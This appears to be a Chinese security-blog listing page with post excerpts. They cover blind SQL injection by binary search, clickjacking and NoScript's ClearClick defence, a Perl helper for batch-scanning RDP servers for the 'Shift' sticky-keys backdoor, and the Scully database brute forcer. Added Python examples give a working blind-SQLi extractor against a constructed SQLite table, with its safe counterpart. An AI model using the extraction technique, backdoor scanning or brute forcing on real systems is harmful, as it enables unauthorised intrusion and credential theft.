Blind SQL Injection by Dichotomy Function
Source: Web安全手册
<?php
# Name -> Blind SQL Injection by Dichotomy Function
# Credits -> charles "real" F. <charlesfol[at]hotmail.fr>
# Date -> 13-04-08
Read more »
Tags: SQL Injection (SQL注入)
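As an added worked example of the dichotomy (binary-search) technique this entry is named after, and not the PHP script from Web安全手册 or charlesfol, the following Python stands up an in-memory SQLite database with constructed sample rows, a deliberately vulnerable lookup that concatenates its parameter into the query, and a true/false oracle that recovers a password one character at a time. The table, column and row contents are assumptions; SQLite's unicode()/substr() stand in for MySQL's ascii()/substring().

```python
"""Blind SQL injection by dichotomy: an added, self-contained illustration.
Not the Web安全手册/charlesfol script. Uses an in-memory SQLite database
with constructed sample data and a deliberately vulnerable query."""
import sqlite3

# Constructed sample data: the secret we will extract through the oracle.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
_conn.execute("INSERT INTO users VALUES (1, 'admin', 'S3cr3t!')")
_conn.execute("INSERT INTO users VALUES (2, 'bob', 'hunter2')")


def vulnerable_lookup(user_id: str) -> bool:
    """Deliberately vulnerable: the parameter is concatenated into the SQL.
    The attacker only learns whether a row came back (profile page versus
    'not found'); nothing from the row is shown. That is the 'blind' part."""
    sql = "SELECT name FROM users WHERE id = " + user_id
    return _conn.execute(sql).fetchone() is not None


def safe_lookup(user_id: str) -> bool:
    """Same query with a bound parameter: the input is a value, never SQL."""
    row = _conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()
    return row is not None


def oracle(predicate: str) -> bool:
    """Turn the page's yes/no behaviour into an answer for any SQL predicate
    by appending 'AND (<predicate>)' to a known-good id."""
    return vulnerable_lookup("1 AND (" + predicate + ")")


def extract_string(subquery: str, max_len: int = 64) -> tuple:
    """Recover the string returned by `subquery` one character at a time.

    Each character's code point is found by bisection over [0, 128): the
    oracle is asked 'is the code point >= mid?' and the interval is halved,
    so every character costs exactly 7 queries instead of up to 127 for a
    linear scan. substr() past the end yields '', whose unicode() is NULL in
    SQLite, so every comparison is false and the search converges on 0,
    which is treated as the terminator. (MySQL: ascii(substring(...)).)
    Returns (recovered_string, number_of_oracle_queries)."""
    out = []
    queries = 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 128          # invariant: lo <= code point < hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            queries += 1
            if oracle(f"unicode(substr(({subquery}), {pos}, 1)) >= {mid}"):
                lo = mid
            else:
                hi = mid
        if lo == 0:              # ran off the end of the string
            break
        out.append(chr(lo))
    return "".join(out), queries


if __name__ == "__main__":
    secret, cost = extract_string("SELECT password FROM users WHERE name = 'admin'")
    print(f"recovered {secret!r} with {cost} oracle queries")
```

Each character costs exactly seven oracle queries (log2 of 128), so the seven-character secret plus the end-of-string probe takes 56 requests, where a linear scan could need up to 127 per character. The same parameter handed to the driver as a bound value (safe_lookup) turns the whole injected predicate into a literal that never matches a numeric id.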
Finally NoScript 1.8.2.1 is out, featuring the announced new anti-clickjacking countermeasures, enabled by default and independent of the IFRAME and plugin content-blocking settings.
The most specific and ambitious is called ClearClick: whenever you click or otherwise interact, through your mouse or your keyboard, with an embedded element which is partially obstructed, transparent or otherwise disguised, NoScript prevents the interaction from completing and reveals the real thing to you "in clear". At that point you can evaluate whether the click target was actually the intended one, and decide whether to keep it locked or unlock it for free interaction. This comes in quite handy now that more dangerous usages of clickjacking are being disclosed, such as enabling your microphone or your webcam behind your back to spy on you through the interwebs.
Read more »
Source: ha.ckers.org
Today is the day we can finally start talking about clickjacking. This is just meant to be a quick post that you can use as a reference sheet. It is not a thorough advisory of every site/vendor/plugin that is vulnerable; there are far too many to count. Jeremiah and I got the final word today that it was fine to start talking about this due to the clickjacking PoC against Flash that was released today (watch the video for a good demonstration), which essentially spilled the beans regarding several of the findings that were most concerning. Thankfully, Adobe has been working on this since we let them know, so despite the careless disclosure, much of the work to mitigate this on their end is already complete.
Read more »
Author: Monyer
The first time I saw this thing called Clickjacking was over at 大风's place, where people talked it up as something mysterious and profound, and I had no idea what it actually was. Today I saw another demo, and I don't know whether it is real or not. But if it is real, then Clickjacking should be something like this:
Read more »
Author: 刺
I just got back from Qinghai and have seen some Clickjacking articles and demos; assuming the demos are correct:
Clickjacking works on much the same principle as XSIO, except that here an iframe is made transparent and style is used to control the position (z-index) of other elements, for example to forge a button.
When the forged button floats over the transparent iframe and the user is induced to click the button, what they actually click is the link inside the iframe.
So when the iframe points at some website, the user can be tricked into clicking links on that site, and the tokens commonly used against CSRF become useless too, because this is the user's own action.
Read more »
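The mechanism described in this post (a transparent iframe stacked above a forged button, so the click the user aims at the button lands inside the frame) and the ClearClick check from the NoScript entry above, as an added Python model that is neither the demo nor NoScript's code: elements are reduced to rectangles with a z-index and an opacity, hit-testing follows the browser rule that the top-most element under the pointer receives the event regardless of opacity, and the layouts, origins and the 0.3 visibility threshold are constructed assumptions.

```python
"""Clickjacking as stacking-order abuse, and a ClearClick-style check.
Added illustration, not NoScript's code: elements are rectangles with a
z-index and opacity; layouts, origins and thresholds are constructed."""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Element:
    name: str
    origin: str             # origin of the document that owns the element
    x: int
    y: int
    w: int
    h: int
    z: int                  # z-index: higher is painted on top
    opacity: float = 1.0    # 0.0 is invisible yet still receives clicks
    is_frame: bool = False  # an <iframe>; its content belongs to `origin`


def contains(e: Element, px: int, py: int) -> bool:
    return e.x <= px < e.x + e.w and e.y <= py < e.y + e.h


def overlaps(a: Element, b: Element) -> bool:
    return a.x < b.x + b.w and b.x < a.x + a.w and a.y < b.y + b.h and b.y < a.y + a.h


def hit_test(elements: List[Element], px: int, py: int) -> Optional[Element]:
    """Where the click really goes: the top-most element under the pointer.
    Opacity is ignored, which is exactly what a transparent iframe exploits."""
    under = [e for e in elements if contains(e, px, py)]
    return max(under, key=lambda e: e.z, default=None)


def visible_target(elements, px, py, threshold=0.3) -> Optional[Element]:
    """What the user believes they are clicking: the top-most element under
    the pointer that is actually visible (opacity at or above threshold)."""
    under = [e for e in elements if contains(e, px, py) and e.opacity >= threshold]
    return max(under, key=lambda e: e.z, default=None)


def clearclick_verdict(elements, px, py, top_origin, threshold=0.3) -> str:
    """ClearClick-style decision: block when the element that would receive
    the click is a cross-origin frame that is transparent or partly covered
    by elements of the embedding page (a decoy skin with a hole over the
    real button). Same-origin frames and plain elements are left alone."""
    target = hit_test(elements, px, py)
    if target is None or not target.is_frame or target.origin == top_origin:
        return "allow"
    transparent = target.opacity < threshold
    obstructed = any(o is not target and o.z > target.z and overlaps(o, target)
                     for o in elements)
    return "block" if transparent or obstructed else "allow"


ATTACKER = "https://attacker.example"   # constructed
BANK = "https://bank.example"           # constructed

# Scenario from the post: forged button underneath, invisible bank frame on
# top, aligned so the bank's real button sits where the forged one shows.
TRANSPARENT_FRAME = [
    Element("page body", ATTACKER, 0, 0, 800, 600, z=0),
    Element("forged 'Claim prize' button", ATTACKER, 300, 250, 200, 50, z=1),
    Element("bank.example iframe", BANK, 100, 100, 600, 400, z=10, opacity=0.0, is_frame=True),
]

# Variant: opaque frame, but the attacker paints over it except for a hole.
OBSTRUCTED_FRAME = [
    Element("page body", ATTACKER, 0, 0, 800, 600, z=0),
    Element("bank.example iframe", BANK, 100, 100, 600, 400, z=1, is_frame=True),
    Element("decoy skin, left", ATTACKER, 0, 0, 300, 600, z=5),
    Element("decoy skin, right", ATTACKER, 500, 0, 300, 600, z=5),
]

# Legitimate embedding: the frame is fully visible and uncovered.
HONEST_EMBED = [
    Element("page body", ATTACKER, 0, 0, 800, 600, z=0),
    Element("bank.example iframe", BANK, 100, 100, 600, 400, z=1, is_frame=True),
]

CLICK = (400, 275)   # centre of the forged button

if __name__ == "__main__":
    print("click lands on:", hit_test(TRANSPARENT_FRAME, *CLICK).name)
    print("user sees:", visible_target(TRANSPARENT_FRAME, *CLICK).name)
    print("verdict:", clearclick_verdict(TRANSPARENT_FRAME, *CLICK, ATTACKER))
```

The two verdict functions make the post's point concrete: hit_test and visible_target disagree on the transparent layout, and the anti-CSRF token is no help because the request is issued by the framed site's own page with the victim's own cookies. The obstruction check is why ClearClick also triggers when the frame is opaque but partly covered.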
鬼仔's note: a supplement to the automatic scan for the 3389 Shift backdoor
Author: cloie
#!/usr/bin/perl
# Closes the dialog titled "中断远程桌面连接" ("Disconnect Remote Desktop
# Connection") whenever it appears, so a batch of RDP (3389) connections
# can proceed without someone clicking it away by hand.
use strict;
use warnings;
use Win32::GUI;
use constant WM_CLOSE => 16;   # 0x0010, the WM_CLOSE window message

sub monitor {
    # Look the dialog up by title (any window class) and ask it to close.
    my $handle = Win32::GUI::FindWindow('', '中断远程桌面连接');
    return unless $handle;     # FindWindow returns 0 when no such window exists
    Win32::GUI::SendMessage($handle, WM_CLOSE, 0, 0);
}
Read more »
Tags: 3389, Shift
Scully is a brute forcer and a simple client interface to MSSQL and MySQL database servers. There is no need to install database client libraries or set up ODBC connections on Windows.
What does Scully do?
Scully is a client interface to MSSQL and MySQL database servers. There is no need for MSSQL/MySQL client libraries to be installed, and no need to set up an ODBC connection either. Simply add the IP/hostname, username, password, port and database name, and SQL away.
Read more »